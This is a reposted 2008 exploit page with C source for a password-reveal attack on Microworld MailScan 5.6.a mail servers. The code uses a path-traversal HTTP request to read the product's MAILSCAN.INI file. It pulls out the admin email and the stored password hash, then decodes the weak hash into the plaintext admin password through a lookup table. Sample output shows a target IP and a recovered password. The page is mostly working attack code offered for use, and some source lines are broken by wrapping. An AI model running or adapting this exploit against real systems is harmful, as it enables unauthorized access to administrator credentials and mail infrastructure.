Microworld Mailscan 5.6.a Password Reveal Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Microworld Mailscan 5.6.a Password Reveal Exploit

来源：www.securitydevelopment.net 作者：SlaYeR 发布时间：2008-09-10

/*
----------------------------------------------------------------------------------------------

       _____           ____
      / ___/___ _____/ __ \___ _   __
      \__ \/ _ \/ ___/ / / / _ \ | / /
     ___/ / __/ /__/ /_/ / __/ |/ /
    /____/\___/\___/_____/\___/|___/
    [2008] SecurityDevelopment.net

Author: SlaYeR
Date: 25. Aug. 2008
Email: slayer@securitydevelopment.net
Website: www.securitydevelopment.net
IRC: dragon.overfl0w.org #securitydevelopment.net

----------------------------------------------------------------------------------------------

Exploit based on the advisory from Oliver Karow @
http://securityvulns.com/Udocument375.html

- MailScan for Mail Servers

    * Version: 5.6.a with espatch1
    * Win32 Platform

Other Mailscan Products, Versions, also, if available
for other platforms, were not tested.

I used the Directory Traversal methode to access the ini file of mailscan
application to gain some importend data.
After some research i found out that the password algorithm was extreamly
weak. So i decided to code a exploit for it.

15. Aug. 2008 - Advisory release
20. Aug. 2008 - SlaYeR founds out about the advisory
21. Aug. 2008 - Found out about the ini file
22. Aug. 2008 - Found out about the weak algorithm and coded a sploit for it.
25. Aug. 2008 - Private version done.
04. Sep. 2008 - Hotfix released by Microworld.
09. Sep. 2008 - Public release

Some special greets to:
Dams - He helped me with some stupid errors inside the decode_hash function
JGS - He helped me with the spliting hash part
Mikke8 - He didn't helped me but i like hem;)

Team Ph0enix - Cuz they Own

----------------------------------------------------------------------------------------------

Example:

         _____           ____
        / ___/___ _____/ __ \___ _   __
        \__ \/ _ \/ ___/ / / / _ \ | / /
       ___/ / __/ /__/ /_/ / __/ |/ /
      /____/\___/\___/_____/\___/|___/
      [2008] SecurityDevelopment.net

- Microworld Mailscan 5.6.a password reveal exploit -
               Coded by: SlaYeR

[!] Targeting 192.168.1.111:10443
[!] Building magic string!
[!] Connected to host!
[!] Building request!
[!] Opening target!
[+] SERVER: MailScan 5.6a
[+] ADMIN: insecure-mailscan@securitydevelopment.net
[+] HASH: GJBIAHALBCHIBJGJGGAEBMAFBIGGAGGKAIBJHLBMAEBJDHAPBH
[+] PASS: "sl@y3r"-owns-m!cr0word|\
[+] Done!

----------------------------------------------------------------------------------------------

*/

#include <stdio.h>
#include <windows.h>
#include <wininet.h>

#pragma comment(lib, "wininet")
#pragma comment(lib,"ws2_32")

char *SECDEV_ASCII=
"         _____           ____           \n"
"        / ___/___ _____/ __ \\___ _   __\n"
"        \\__ \\/ _ \\/ ___/ / / / _ \\ | / /\n"
"       ___/ / __/ /__/ /_/ / __/ |/ / \n"
"      /____/\\___/\\___/_____/\\___/|___/ \n"
"      [2008] SecurityDevelopment.net\r\n"
"\r\n"
" - Microworld Mailscan 5.6.a password reveal exploit -\r\n"
"               Coded by: SlaYeR\r\n"
"                          \r\n\r\n";

int decode_hash(char * string);
int Count;
int exploit(char *url,char *port);

int main(int argc, char *argv[])
{
char *url = argv[1];
char *port = argv[2];
printf(SECDEV_ASCII);

if( argc <= 2 )
{
printf(" Usage: %s <IP> <PORT>\n",argv[0]);
return 0;
}
else
{
exploit(url,port);
}
return 0;
}

int exploit(char *url,char *port)
{
printf("[!] Targeting %s:%s\n",url,port);

HINTERNET httpopen, openurl;
char buffer2[1024];
DWORD read;
char *check;
char *string1 = "http://";
char *string2 = "/../../../../PROGRA~1/MailScan/MAILSCAN.INI";
char bigbuffer[1025];
char buffer3[1025];
char buffer4[1025];
char buffer5[1025];
char buffer6[1025];

if(httpopen = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0))
{
printf("[!] Building request!\n");
memset(bigbuffer,0,1025);
memcpy(bigbuffer,string1,strlen(string1));
memcpy(bigbuffer+strlen(bigbuffer),url,strlen(url));
memcpy(bigbuffer+strlen(bigbuffer),":",strlen(":"));
memcpy(bigbuffer+strlen(bigbuffer),port,strlen(port));
memcpy(bigbuffer+strlen(bigbuffer),string2,strlen(string2));
}
else
{
printf("[-] Error building request!\n");
InternetCloseHandle(httpopen);
CloseHandle(buffer2);
return 0;
}

printf("[!] Trying to connect @ %s:%s\n",url,port);
if(openurl = InternetOpenUrl(httpopen, bigbuffer, NULL, NULL,
INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE, NULL))
{
printf("[!] Connected to host!\n");
}
else
{
printf("[-] Error while connecting! \n");
InternetCloseHandle(httpopen);
InternetCloseHandle(openurl);
CloseHandle(buffer2);
return 0;
}

if(InternetReadFile(openurl, buffer2, sizeof(buffer2), &read))
{

if(check = strstr(buffer2, "[General]"))
{

   check = strstr(buffer2, "UserPassword=");
   sscanf(check, "UserPassword=%s ", buffer3);

   check = strstr(buffer2, "AdminEmailId=");
   sscanf(check, "AdminEmailId=%s ", buffer4);

   check = strstr(buffer2, "ProductName=");
   sscanf(check, "ProductName=%s ", buffer5);

   check = strstr(buffer2, "Version=");
   sscanf(check, "Version=%s ", buffer6);
}

if( check==NULL )
{
printf("[-] Server not vuln :(\n");

}
else
{
printf("[+] SERVER: %s %s\n",buffer5,buffer6);
printf("[+] ADMIN: %s\n",buffer4);
printf("[+] HASH: %s\n",buffer3);
printf("[+] PASS: ");

char bufferfiller[sizeof(buffer3)];
char temp[1025];

memset(bufferfiller,0,sizeof(buffer3));

for (int i=0;i < strlen(buffer3); i++)
{
   Count++;

   sprintf(temp,"%c",buffer3[i]);
   memcpy(bufferfiller+strlen(bufferfiller),temp,strlen(temp));

   if(Count == 2)
   {
    char buf[255];
    memset(buf,0,sizeof(255));
    sprintf(buf,"%s",bufferfiller);

    decode_hash(buf);
    memset(bufferfiller,0,1025);
    Count = 0;
   }
}
printf("\n[+] Done!\n");
}
}
else
{
printf("[-] Server not vuln :(\n");
}

InternetCloseHandle(httpopen);
InternetCloseHandle(openurl);
CloseHandle(buffer2);

return 0;
}

int decode_hash(char * string)
{

// Yes it token me allot of work to wrote this down... (only default
charset)
// if you want more just do it by yourself

if( strcmp( string, "DA" ) == 0 ){printf("{");} if( strcmp( string, "DG"
) == 0 ){printf("}");}
if( strcmp( string, "BH" ) == 0 ){printf("|");} if( strcmp( string, "HB"
) == 0 ){printf(":");}
if( strcmp( string, "GJ" ) == 0 ){printf("\"");} if( strcmp( string, "HH"
) == 0 ){printf("<");}
if( strcmp( string, "HF" ) == 0 ){printf(">");} if( strcmp( string, "HE"
) == 0 ){printf("?");}
if( strcmp( string, "BA" ) == 0 ){printf("[");} if( strcmp( string, "BG"
) == 0 ){printf("]");}
if( strcmp( string, "BH" ) == 0 ){printf("\\");} if( strcmp( string, "HA"
) == 0 ){printf(";");}
if( strcmp( string, "GM" ) == 0 ){printf("'");} if( strcmp( string, "GH"
) == 0 ){printf(",");}
if( strcmp( string, "GF" ) == 0 ){printf(".");} if( strcmp( string, "GE"
) == 0 ){printf("/");}
if( strcmp( string, "DF" ) == 0 ){printf("~");} if( strcmp( string, "GK"
) == 0 ){printf("!");}
if( strcmp( string, "AL" ) == 0 ){printf("@");} if( strcmp( string, "GI"
) == 0 ){printf("#");}
if( strcmp( string, "GP" ) == 0 ){printf("$");} if( strcmp( string, "GO"
) == 0 ){printf("%");}
if( strcmp( string, "BF" ) == 0 ){printf("^");} if( strcmp( string, "GN"
) == 0 ){printf("&");}
if( strcmp( string, "GB" ) == 0 ){printf("*");} if( strcmp( string, "GD"
) == 0 ){printf("(");}
if( strcmp( string, "BE" ) == 0 ){printf("_");} if( strcmp( string, "GA"
) == 0 ){printf("+");}
if( strcmp( string, "GG" ) == 0 ){printf("-");} if( strcmp( string, "HG"
) == 0 ){printf("=");}
if( strcmp( string, "AK" ) == 0 ){printf("a");} if( strcmp( string, "AJ"
) == 0 ){printf("b");}
if( strcmp( string, "AI" ) == 0 ){printf("c");} if( strcmp( string, "AP"
) == 0 ){printf("d");}
if( strcmp( string, "AO" ) == 0 ){printf("e");} if( strcmp( string, "AN"
) == 0 ){printf("f");}
if( strcmp( string, "AM" ) == 0 ){printf("g");} if( strcmp( string, "AD"
) == 0 ){printf("h");}
if( strcmp( string, "AC" ) == 0 ){printf("i");} if( strcmp( string, "AB"
) == 0 ){printf("j");}
if( strcmp( string, "AA" ) == 0 ){printf("k");} if( strcmp( string, "AH"
) == 0 ){printf("l");}
if( strcmp( string, "AG" ) == 0 ){printf("m");} if( strcmp( string, "AF"
) == 0 ){printf("n");}
if( strcmp( string, "AE" ) == 0 ){printf("o");} if( strcmp( string, "BL"
) == 0 ){printf("p");}
if( strcmp( string, "BK" ) == 0 ){printf("q");} if( strcmp( string, "BJ"
) == 0 ){printf("r");}
if( strcmp( string, "BI" ) == 0 ){printf("s");} if( strcmp( string, "BP"
) == 0 ){printf("t");}
if( strcmp( string, "BO" ) == 0 ){printf("u");} if( strcmp( string, "BN"
) == 0 ){printf("v");}
if( strcmp( string, "BM" ) == 0 ){printf("w");} if( strcmp( string, "BD"
) == 0 ){printf("x");}
if( strcmp( string, "BC" ) == 0 ){printf("y");} if( strcmp( string, "BB"
) == 0 ){printf("z");}
if( strcmp( string, "HK" ) == 0 ){printf("1");} if( strcmp( string, "HJ"
) == 0 ){printf("2");}
if( strcmp( string, "HI" ) == 0 ){printf("3");} if( strcmp( string, "HP"
) == 0 ){printf("4");}
if( strcmp( string, "HO" ) == 0 ){printf("5");} if( strcmp( string, "HN"
) == 0 ){printf("6");}
if( strcmp( string, "HM" ) == 0 ){printf("7");} if( strcmp( string, "HD"
) == 0 ){printf("8");}
if( strcmp( string, "HC" ) == 0 ){printf("9");} if( strcmp( string, "HL"
) == 0 ){printf("0");}
if( strcmp( string, "GC" ) == 0 ){printf(")");} if( strcmp( string, "GL"
) == 0 ){printf(" ");}

return 0;
}

[